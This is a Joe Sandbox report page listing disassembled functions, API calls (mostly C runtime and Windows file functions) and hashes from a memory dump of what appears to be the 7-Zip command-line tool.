Opcode ID: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
Instruction ID: bfcab6aa907e1443868649bc00cbc22b4684fdac69a714c96ef78b474b194993
Opcode Fuzzy Hash: 419078b5561bcbe998c8bace5f80db078349074a36591a840ea38ec4c74fc1c5
Instruction Fuzzy Hash: 0641E632304A8491CA10FF16E88026EA761F7A5BE8F495226EF7D47769DF38C84AC700

Function 0021E16E Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0021E1C2
__setusermatherr.MSVCRT ref: 0021E211
_initterm.MSVCRT ref: 0021E225
__getmainargs.MSVCRT ref: 0021E256
_initterm.MSVCRT ref: 0021E26A
_cexit.MSVCRT ref: 0021E29D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
Instruction ID: f50c6ea1cfa4aefd99b2b06836326a47cc1d6f466c9b2650a054f9ef7d2402e3
Opcode Fuzzy Hash: 7bb71b32ccd8ca11bad9e88b1576836c321785d074d4d8a0f920451f9c6aec85
Instruction Fuzzy Hash: 46314E71124B82C6EB50DF28E99839A77B1F3A4764F511236EA7D436A4DF3CC995CB00

Function 0021E139 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0021E1C2
__setusermatherr.MSVCRT ref: 0021E211
_initterm.MSVCRT ref: 0021E225
__getmainargs.MSVCRT ref: 0021E256
_initterm.MSVCRT ref: 0021E26A
_cexit.MSVCRT ref: 0021E29D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00

Function 0021E15A Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0021E1C2
__setusermatherr.MSVCRT ref: 0021E211
_initterm.MSVCRT ref: 0021E225
__getmainargs.MSVCRT ref: 0021E256
_initterm.MSVCRT ref: 0021E26A
_cexit.MSVCRT ref: 0021E29D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00

Function 0021E1A6 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0021E1C2
__setusermatherr.MSVCRT ref: 0021E211
_initterm.MSVCRT ref: 0021E225
__getmainargs.MSVCRT ref: 0021E256
_initterm.MSVCRT ref: 0021E26A
_cexit.MSVCRT ref: 0021E29D

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: _initterm$__getmainargs__set_app_type__setusermatherr_cexit
String ID:
API String ID: 352749199-0
Opcode ID: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction ID: e4ef4e695e48a218d70db35c5ec97545350d5d51ee80cab8657818017a6a3020
Opcode Fuzzy Hash: df01363d105557db7d6733dfac239b6cd4c4f9791f50a13a19417a34d94178c8
Instruction Fuzzy Hash: 1D21FB75224B8186EB40DF29E95839A77B1F7A4764F501226EA7E437B4DF3CC949CB00

Function 001F4610 Relevance: 8.8, APIs: 7, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00203EE0: free.MSVCRT ref: 00203F45

free.MSVCRT ref: 001F4633
free.MSVCRT ref: 001F463C
free.MSVCRT ref: 001F4646
free.MSVCRT ref: 001F4672
free.MSVCRT ref: 001F467A
free.MSVCRT ref: 001F4687
free.MSVCRT ref: 001F46BA

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
Instruction ID: 45284dd71a726d9e3981522fdbd1eca1b2c31bfc79da6a3a07553c35840cab27
Opcode Fuzzy Hash: 899f08306957a66c740d4174f20d1bdb533731c698e095d3b789b8ce7f7e4d05
Instruction Fuzzy Hash: 8F118C23740A8887CA24FE22D99112A2320EBB3BB070C8222DF3D57795DF20E8628310

Function 001F419C Relevance: 8.8, APIs: 7, Instructions: 45COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F41B9
free.MSVCRT ref: 001F41C5
free.MSVCRT ref: 001F41D1
free.MSVCRT ref: 001F41DD
free.MSVCRT ref: 001F41E6
free.MSVCRT ref: 001F41EF
free.MSVCRT ref: 001F41F8

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
Instruction ID: a772b3b492b6f7544dd66ca63c47d4f1def8083bc0c931422d82617648ae4779
Opcode Fuzzy Hash: 29f7608983fcae077df9a41f20b4e1c47ea80a41590d90ea80717b354026d7b0
Instruction Fuzzy Hash: 9611A522311A4486CF14EF75D8A122D7320FBE1F99B188662EB7E4B765CF34D8468354

Function 00203A42 Relevance: 7.7, APIs: 6, Instructions: 151COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00203C0C
free.MSVCRT ref: 00203C17
free.MSVCRT ref: 00203C22
free.MSVCRT ref: 00203C77
free.MSVCRT ref: 00203C82

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
Instruction ID: 3923b0b3ec52ea6cd391059b208f2774fa0611c3a9490910319bb0569121a31d
Opcode Fuzzy Hash: 3c674b90aae9c7a3b63d2bdd2af22403dde61106ae7c1b39dd43b612bf24b9b2
Instruction Fuzzy Hash: EB515773200A4591CB10EF25D4902AE6721F7E5FC8F948023EB5E9776ACF38CA9AC741

Function 00211544 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 002115D5

Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232

Strings

Testing archive: , xrefs: 002115C0
Open, xrefs: 00211604
Extracting archive: , xrefs: 002115C7

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$memset
String ID: Extracting archive: $Open$Testing archive:
API String ID: 3543874852-295398807
Opcode ID: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
Instruction ID: a04f30224af54615ddbfb1e9654caa55e08e6ef8926e404c4cba29521892e18f
Opcode Fuzzy Hash: 9f4bf5ef788e6728e8579e5dfc2a785cb0374665964cbcc9bd9e207323b06e63
Instruction Fuzzy Hash: 8E11BF2275268394DF50AF29E9483E823A0E768B98F588432DE1D4A360EF39C4DAC310

Function 00212E24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00212E47
fputs.MSVCRT ref: 00212E57
free.MSVCRT ref: 00212EA4

Part of subcall function 00212CFC: fputs.MSVCRT ref: 00212D41
Part of subcall function 00212CFC: fputs.MSVCRT ref: 00212DCF
Part of subcall function 00212CFC: free.MSVCRT ref: 00212DFF

Strings

= , xrefs: 00212E50

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: fputs$free
String ID: =
API String ID: 3873070119-2525689732
Opcode ID: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
Instruction ID: 9c822486769f787d9b96743ba1ebbbbac50ce6fc702cdf24d19839210d88ce4e
Opcode Fuzzy Hash: 4cca910cc9feef97d39b55c90a06b9effa51fec30a6b783ec7096b57ced3bdf6
Instruction Fuzzy Hash: 88F067A231454090DA20EB26EA5537D5351ABB5FF4F049312ED7D077A8DF38C5558700

Function 002049B0 Relevance: 6.4, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00204A5C
free.MSVCRT ref: 00204A67
free.MSVCRT ref: 00204AE4

Part of subcall function 001D3314: memmove.MSVCRT ref: 001D3339

free.MSVCRT ref: 00204B0F
free.MSVCRT ref: 00204B1A

Part of subcall function 001D2130: malloc.MSVCRT ref: 001D2134
Part of subcall function 001D2130: _CxxThrowException.MSVCRT ref: 001D214F

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmallocmemmove
String ID:
API String ID: 3352498445-0
Opcode ID: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
Instruction ID: 0bc24be3c5b406c73570d171322e0539693611012810c2a358c7f5da95629b63
Opcode Fuzzy Hash: ffa01df610a78eb8c6bf6cbd45b0887f3d376cc6246ea700225451970a264df5
Instruction Fuzzy Hash: A6419C63314B8591CB20EF25D8503AE6761FB96B88F488132EB8E4776ADF38C5A5C314

Function 0021E120 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
Instruction ID: 9c24a6d30425a585a69bb215a3688a4598961411f98ec7f2f0907136a59d426a
Opcode Fuzzy Hash: ee94cdd725bc1b4db16937cbd8c93f2249c1c3cc61606458e41898ca9daa4340
Instruction Fuzzy Hash: 0C313C72224B81D6EB50DF28E99439A77B0F394B64F505226EAAD437B4DB3CC995CB00

Function 001D2320 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001D237E
free.MSVCRT ref: 001D23AB
fputs.MSVCRT ref: 001D23B8
free.MSVCRT ref: 001D23C4

Part of subcall function 001D3274: memmove.MSVCRT ref: 001D32AC

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$fputsmemmove
String ID:
API String ID: 4106585527-0
Opcode ID: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
Instruction ID: a1987cead98a98ab653f3e500ebeb73b894da32227b81394a3ee69d5d8ab9488
Opcode Fuzzy Hash: de874a376c389c5634e5b3a271c24aa59135fb5864ed34f7a1f8a9b157696600
Instruction Fuzzy Hash: 3F01006220894091DA20AB25E85155EA721E7E5BE4F445322FA7E877F8DF38C686C700

Function 001D68A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE ref: 001D68C7
SetFileAttributesW.KERNEL32 ref: 001D6903
free.MSVCRT ref: 001D6913
free.MSVCRT ref: 001D6921

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
Instruction ID: cad5a1368d71818abe4554ec5b26c6922b08ca49a7c3f642444e0a04712621ff
Opcode Fuzzy Hash: 2ecb6214096e143b2484f2832f1280b3ab62ecd8edf6342453ae4ca911538852
Instruction Fuzzy Hash: 1501F22230421182CA30AB25959027E17249BA97F4F584323AE7D873A4CF38CD8B9701

Function 001D7D4C Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE ref: 001D7D6E
GetFileAttributesW.KERNEL32 ref: 001D7DA5
free.MSVCRT ref: 001D7DB2
free.MSVCRT ref: 001D7DC0

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: AttributesFilefree
String ID:
API String ID: 1936811914-0
Opcode ID: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
Instruction ID: 4039e0b2dc9dae822d3faa58e306061bd664b179cfff443ff091f5a0c6ee5d8b
Opcode Fuzzy Hash: 90b61e9f4f0805f8493b7b2730efc4ecc0887a88725c8ba3c0691ab996cf754b
Instruction Fuzzy Hash: 87F04426208A4181CA30EB75A99527D66619FE97F4F580322EE7A877F5EF24C9868700

Function 001F3E14 Relevance: 5.1, APIs: 4, Instructions: 142COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F3F66
memmove.MSVCRT ref: 001F3F8B
free.MSVCRT ref: 001F4028
free.MSVCRT ref: 001F4033

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
Instruction ID: de7d0208f6e501a80340ad5643fc2101ac2c38aa3a0a3eadeab8a784d2712d2e
Opcode Fuzzy Hash: e8f9cdc7cbc43501b9a821d31bcf444afd51c02bda1371c1c9b7f3f0ed001691
Instruction Fuzzy Hash: C751BF72704A8497CB30DF16E8802ADB361F798BD4F404226EBAE47B59DF38D5A5CB50

Function 001F9BCC Relevance: 5.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F9C11
free.MSVCRT ref: 001F9C19
free.MSVCRT ref: 001F9C3B
free.MSVCRT ref: 001F9D2A

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
Instruction ID: 8680655fae2bd04494d0e577059b3b5d32b38c8764d61f59be4aaf41d11d2326
Opcode Fuzzy Hash: c672974581852c8ab8e8e4232f116f9865b8037c8c9b18d6af4eac83a37c9762
Instruction Fuzzy Hash: 0C31836371568886CB60EF16E48052EA7A1F7A87A4B598236FF9E47758DF38C981C700

Function 001FA9FC Relevance: 5.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001FAA95
free.MSVCRT ref: 001FAAB8
free.MSVCRT ref: 001FAAC5
free.MSVCRT ref: 001FAAD2

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
Instruction ID: 318f3e380f946c53494b8b0a88d41d496169689d5463727e61e1f495d8027bdb
Opcode Fuzzy Hash: 2fb1bdadda0f0f67c2ab4cf383632212aedf00074fa5b7e75f5519585e2e69a4
Instruction Fuzzy Hash: 14118A6120894451DA10EA65E5512BA9760EFE13F4F945322BBBE477E9DF2CC94BCB00

Function 001FCF80 Relevance: 5.1, APIs: 4, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 001D3404: free.MSVCRT ref: 001D3431
Part of subcall function 001D3404: memmove.MSVCRT ref: 001D344C

free.MSVCRT ref: 001FCFC9
_CxxThrowException.MSVCRT ref: 001FCFE6
free.MSVCRT ref: 001FD019
free.MSVCRT ref: 001FD021

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ExceptionThrowmemmove
String ID:
API String ID: 3934437811-0
Opcode ID: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
Instruction ID: 75bd6e2183db3bdb236f7e592a87357f32f1ae3ba6e822327a1e21144b962ae1
Opcode Fuzzy Hash: 3a97ebef2fcd1cdc2599d13047a49bc923f0f8c10aefa58592d67d2e468ee3f2
Instruction Fuzzy Hash: C81184637006848BCA209F25E9543AAA760E7627A4F484226EFA9077A9DF78D54AC710

Function 001F01A8 Relevance: 5.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001F0211
free.MSVCRT ref: 001F021C
free.MSVCRT ref: 001F0249
free.MSVCRT ref: 001F0254

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
Instruction ID: 697fbe99019b2417ee69f4d838ce611d3cd9af81677600195e6f117834b3a554
Opcode Fuzzy Hash: 2682a3d483ed8198c6bc67279e3496169ab0818a4c7350e9ba69b47f62e70939
Instruction Fuzzy Hash: B301D62220464481CE20EB22F95517E9331EBE67E4F485223BFBE577AADF38C54AC710

Function 001D8CDC Relevance: 4.6, APIs: 3, Instructions: 75fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001D89D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 001D89EA

CreateFileW.KERNELBASE ref: 001D8D51
CreateFileW.KERNEL32 ref: 001D8DA4
free.MSVCRT ref: 001D8DB2

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CreateFile$CloseHandlefree
